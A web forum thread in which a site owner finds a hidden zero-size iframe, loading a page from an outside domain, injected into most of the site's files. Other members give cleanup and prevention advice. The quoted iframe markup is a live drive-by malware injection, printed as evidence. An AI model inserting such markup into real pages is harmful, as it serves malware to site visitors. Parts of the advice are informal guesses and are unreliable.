Hi When i try to access my websites I keep getting this message : Reported Attack Site! This web site at mywebsite.com has been reported as an attack site and has been blocked based on your security preferences. Attack sites try to install programs that steal private information, use your computer to attack others, or damage your system. Some attack sites intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners Code (markup): I have looked throgh my files and i have this iframe in almost all the files of my website: <iframe src="http://odile-marco.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://odile-marco.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://odile-marco.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://odile-marco.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe> Code (markup): I have removed this iframe from one of my website and contacted google and its back within 2 hours . How the hell someone can do that? i mean the problem is not getting my websites back but im afraid that he do that again. Any idea how someone can do that? Thanks
looks like someone hacked your web hosting, contact your hosting company as soon as possible and let them know what happened and what you found. where are you hosted by the way?
It is very obvious that your site has been compromised. You need to change your password and then delete all files from the site and then upload a clean copy of them. There is something hidden in one of the files that is recreating it each time you remove it.
There are many ways to get in and do things and the best advice is change all passwords in C panels, Admin panels and anywhere they can get in and make them harder to crack... And as always watch whom you give access to your websites to... thx M1
Thanks all for those tips, i have never shared my password with anyone I have deleted all those iframes . To lcwadminbj : you said "There is something hidden in one of the files that is recreating it each time you remove it. " how can i find this thing? it will be a pain to search all the files . I was thinking about those plugins and scripts using ionCube PHP Encoder , they can do that? and if so how to protect myself from being hacked again? Thanks
Can you make sure all the installed scripts and plugins are clean? Otherwise it's useless whatever you change the password to prevent to be hacked. Anyway contact your hosting to see if they can help you to figure out the big problem.
As has already been said you need to change ALL your passwords - I recommend using at least a 15 long and preferably 20 long passwords consisting of random characters/symbols - If you have plugins then only use ones from reputable sources. using IONCUBE costs money so in my opinion the hackers wont bother to encode their nasties using it. I had a similar situation and the only solution was to delete all the files in my public_html folder and then upload the site again from the files on my PC using FTP. Now I know better and created a system to run an automatic daily backup of my Public_html folders and databases so I can restore a site very fast if it is compromised. It is vital to have backups. Even if you think you are not vunerable to attack. Hackers will strike anywhere anytime.
Thanks you for this great post This is exactly what i have done , , and i will keep backups for my websites, because this is the second time that happened to me, (the first time was worst the hacker deleted ALL my websites) but now i have deleted the malware and i have a full buckup Thanks again and rep added
First thing you should do is change your passwords. Second, don't save any account details & passwords in FTP softwares. More info @ How To Completely Remove All Malicious Iframes on Your Website Malicious iframe virus hit my website few months ago too
Ok Simple , here is the real solution This is not new , I and Many others must have faced this This is because when you must have browsed some website , it must have downloaded Trojan or any other virus. Now this Virus , picks the Password and username from your FTP client And then they inject this code from there, Usually all index files are affected. In root folder main index or any other folder which has index page will be affected. How to get rid of this ? You have to have FULL VERSION of Antirvirus , Anyone which you have , I have Norton RUN it and you will get the list of affected virus , Click on clean them and they will be deleted Once you done above, then go and change your FTP password so it wont get it again If you dont clean your PC using Anti virus and just change your FTP password, this would keep coming again . As no one is sharing ur password other then Your very Own PC where virus is actually residing and reading your FTP user/pass. Also this is just a injection to index pages only so dont worry With my experience I havent seen other pages being affected. So hope your other pages are safe. CLEAN it ASAP . Thats it
Same Problem with me change your Permission for Index Files to 444 and If still Virus Attack you have to clean your server completely I have done this and now mine sites save. Also check .htacess file
nice solution though. in other word we need to have our antivirus up-to-date. good info and i will keep it as a remainder to me also.
Thanks all for your support , this thread become very informative i thing i should learn alot about security , and merlinseo thanks for your post i didn't know there is such a malware that steal FTP logins . Thanks
Well I thanked TheLasTSamurai for the positive feed back so it is only fair to say thanks to the person that gave me a negative rep and called me an idiot even though they didnt have the guts to say who they were. So childish!
This thread is quite old but I have seen this on a couple of different websites recently and there has been an increase in serps / PR rank due to this believe it or not! One site went from pr3 to pr4 not on links but I think due to content - 50 pages indexed before and 400 pages indexed after (although readers cant access the other pages google indexes them). The other site is similar - has anyone else seen this?